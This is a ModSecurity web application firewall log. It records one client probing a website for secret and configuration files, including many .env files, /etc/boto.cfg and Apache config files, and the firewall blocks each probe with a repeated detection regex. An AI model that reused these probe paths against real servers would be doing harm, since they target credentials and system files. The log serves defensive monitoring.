[Tue May 26 14:50:00.923811 2026] [security2:error] [pid 648203:tid 648341] [client 45.148.10.95:17154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/module.config.php"] [unique_id "ahVlwLEQDDtxJNiDrdTywAAAAI0"]
[Tue May 26 14:50:00.930336 2026] [security2:error] [pid 648203:tid 648354] [client 45.148.10.95:31746] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyvwAAAJo"]
[Tue May 26 14:50:00.932923 2026] [security2:error] [pid 648203:tid 648386] [client 45.148.10.95:31638] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyvgAAALo"]
[Tue May 26 14:50:00.988914 2026] [security2:error] [pid 648203:tid 648403] [client 45.148.10.95:31660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/config/stripe.php"] [unique_id "ahVlwLEQDDtxJNiDrdTywgAAAMs"]
[Tue May 26 14:50:01.058073 2026] [security2:error] [pid 648203:tid 648458] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyxAAAAQI"]
[Tue May 26 14:50:01.134752 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTyxwAAAKM"]
[Tue May 26 14:50:01.142234 2026] [security2:error] [pid 648203:tid 648410] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTyygAAANI"]
[Tue May 26 14:50:01.166494 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTyzQAAAMU"]
[Tue May 26 14:50:01.200754 2026] [security2:error] [pid 648203:tid 648447] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTy0AAAAPc"]
[Tue May 26 14:50:01.272351 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.95:31736] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTy1AAAAOk"]
[Tue May 26 14:50:01.322067 2026] [security2:error] [pid 648203:tid 648435] [client 45.148.10.95:31648] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTy2AAAAOs"]
[Tue May 26 14:50:01.357890 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:17002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTy3QAAALc"]
[Tue May 26 14:50:01.368982 2026] [security2:error] [pid 648203:tid 648334] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTy4gAAAIY"]
[Tue May 26 14:50:01.373958 2026] [security2:error] [pid 648203:tid 648367] [client 65.111.1.238:10765] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlwLEQDDtxJNiDrdTyjwAAAKc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:50:01.390341 2026] [security2:error] [pid 648203:tid 648420] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTy5gAAANw"]
[Tue May 26 14:50:01.392950 2026] [security2:error] [pid 648203:tid 648384] [client 45.148.10.95:31638] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTy4wAAALg"]
[Tue May 26 14:50:01.412581 2026] [security2:error] [pid 648203:tid 648434] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTy6QAAAOo"]
[Tue May 26 14:50:01.473122 2026] [security2:error] [pid 648203:tid 648337] [client 45.148.10.95:31704] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTy6gAAAIk"]
[Tue May 26 14:50:01.519567 2026] [security2:error] [pid 648203:tid 648429] [client 45.148.10.95:16970] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/cron/.env"] [unique_id "ahVlwbEQDDtxJNiDrdTy9gAAAOU"]
[Tue May 26 14:50:01.553874 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:31762] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTy7gAAALI"]
[Tue May 26 14:50:01.567565 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:17142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/demo/.env"] [unique_id "ahVlwbEQDDtxJNiDrdTy9wAAAPs"]
[Tue May 26 14:50:01.568738 2026] [security2:error] [pid 648203:tid 648347] [client 45.148.10.95:31768] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTy9AAAAJM"]
[Tue May 26 14:50:01.573351 2026] [security2:error] [pid 648203:tid 648394] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTy9QAAAMI"]
[Tue May 26 14:50:01.767197 2026] [security2:error] [pid 648203:tid 648401] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTy_QAAAMk"]
[Tue May 26 14:50:01.782428 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:17142] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTy_wAAAPA"]
[Tue May 26 14:50:01.794924 2026] [security2:error] [pid 648203:tid 648403] [client 45.148.10.95:31638] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/crm/.env"] [unique_id "ahVlwbEQDDtxJNiDrdTzCAAAAMs"]
[Tue May 26 14:50:01.795104 2026] [security2:error] [pid 648203:tid 648405] [client 45.148.10.95:31768] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTy_gAAAM0"]
[Tue May 26 14:50:01.812928 2026] [security2:error] [pid 648203:tid 648437] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTzAgAAAO0"]
[Tue May 26 14:50:01.831507 2026] [security2:error] [pid 648203:tid 648352] [client 45.148.10.95:31808] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/current/.env"] [unique_id "ahVlwbEQDDtxJNiDrdTzDQAAAJg"]
[Tue May 26 14:50:01.843031 2026] [security2:error] [pid 648203:tid 648336] [client 45.148.10.95:31782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTzAwAAAIg"]
[Tue May 26 14:50:01.894404 2026] [security2:error] [pid 648203:tid 648365] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTzCQAAAKU"]
[Tue May 26 14:50:01.899860 2026] [security2:error] [pid 648203:tid 648442] [client 45.148.10.95:16970] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/development/.env"] [unique_id "ahVlwbEQDDtxJNiDrdTzFQAAAPI"]
[Tue May 26 14:50:01.936077 2026] [security2:error] [pid 648203:tid 648370] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTzEgAAAKo"]
[Tue May 26 14:50:01.948338 2026] [security2:error] [pid 648203:tid 648361] [client 45.148.10.95:31768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/dev/.env"] [unique_id "ahVlwbEQDDtxJNiDrdTzFgAAAKE"]
[Tue May 26 14:50:02.016905 2026] [security2:error] [pid 648203:tid 648351] [client 45.148.10.95:31854] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/develop/.env"] [unique_id "ahVlwrEQDDtxJNiDrdTzHgAAAJc"]
[Tue May 26 14:50:02.022314 2026] [security2:error] [pid 648203:tid 648416] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTzGQAAANg"]
[Tue May 26 14:50:02.042513 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:17002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTzGgAAAMU"]
[Tue May 26 14:50:02.077917 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:31824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/developer/.env"] [unique_id "ahVlwrEQDDtxJNiDrdTzIwAAANA"]
[Tue May 26 14:50:02.079175 2026] [security2:error] [pid 648203:tid 648396] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTzHQAAAMQ"]
[Tue May 26 14:50:02.161263 2026] [security2:error] [pid 648203:tid 648364] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzJgAAAKQ"]
[Tue May 26 14:50:02.227068 2026] [security2:error] [pid 648203:tid 648434] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzLAAAAOo"]
[Tue May 26 14:50:02.230666 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzKwAAAKk"]
[Tue May 26 14:50:02.231970 2026] [security2:error] [pid 648203:tid 648429] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzMAAAAOU"]
[Tue May 26 14:50:02.232258 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzMgAAALI"]
[Tue May 26 14:50:02.251329 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:31688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzMwAAAPs"]
[Tue May 26 14:50:02.329594 2026] [security2:error] [pid 648203:tid 648391] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzNwAAAL8"]
[Tue May 26 14:50:02.335738 2026] [security2:error] [pid 648203:tid 648335] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzOQAAAIc"]
[Tue May 26 14:50:02.337752 2026] [security2:error] [pid 648203:tid 648445] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlwbEQDDtxJNiDrdTzDgAAAPU"]
[Tue May 26 14:50:02.382588 2026] [security2:error] [pid 648203:tid 648400] [client 45.148.10.95:31648] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/fe/.env"] [unique_id "ahVlwrEQDDtxJNiDrdTzSQAAAMg"]
[Tue May 26 14:50:02.385284 2026] [security2:error] [pid 648203:tid 648340] [client 45.148.10.95:31638] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/etc/boto.cfg"] [unique_id "ahVlwrEQDDtxJNiDrdTzSgAAAIw"]
[Tue May 26 14:50:02.396484 2026] [security2:error] [pid 648203:tid 648444] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzRQAAAPQ"]
[Tue May 26 14:50:02.430410 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzSAAAAI8"]
[Tue May 26 14:50:02.465560 2026] [security2:error] [pid 648203:tid 648457] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzTQAAAQE"]
[Tue May 26 14:50:02.486904 2026] [security2:error] [pid 648203:tid 648352] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzUAAAAJg"]
[Tue May 26 14:50:02.510048 2026] [security2:error] [pid 648203:tid 648365] [client 45.148.10.95:17002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzUQAAAKU"]
[Tue May 26 14:50:02.515888 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzVAAAAKY"]
[Tue May 26 14:50:02.532523 2026] [security2:error] [pid 648203:tid 648339] [client 45.148.10.95:16970] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/erp/.env"] [unique_id "ahVlwrEQDDtxJNiDrdTzVQAAAIs"]
[Tue May 26 14:50:02.592443 2026] [security2:error] [pid 648203:tid 648389] [client 45.148.10.95:31806] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVlwrEQDDtxJNiDrdTzXwAAAL0"]
[Tue May 26 14:50:02.630267 2026] [security2:error] [pid 648203:tid 648353] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlwrEQDDtxJNiDrdTzWwAAAJk"]
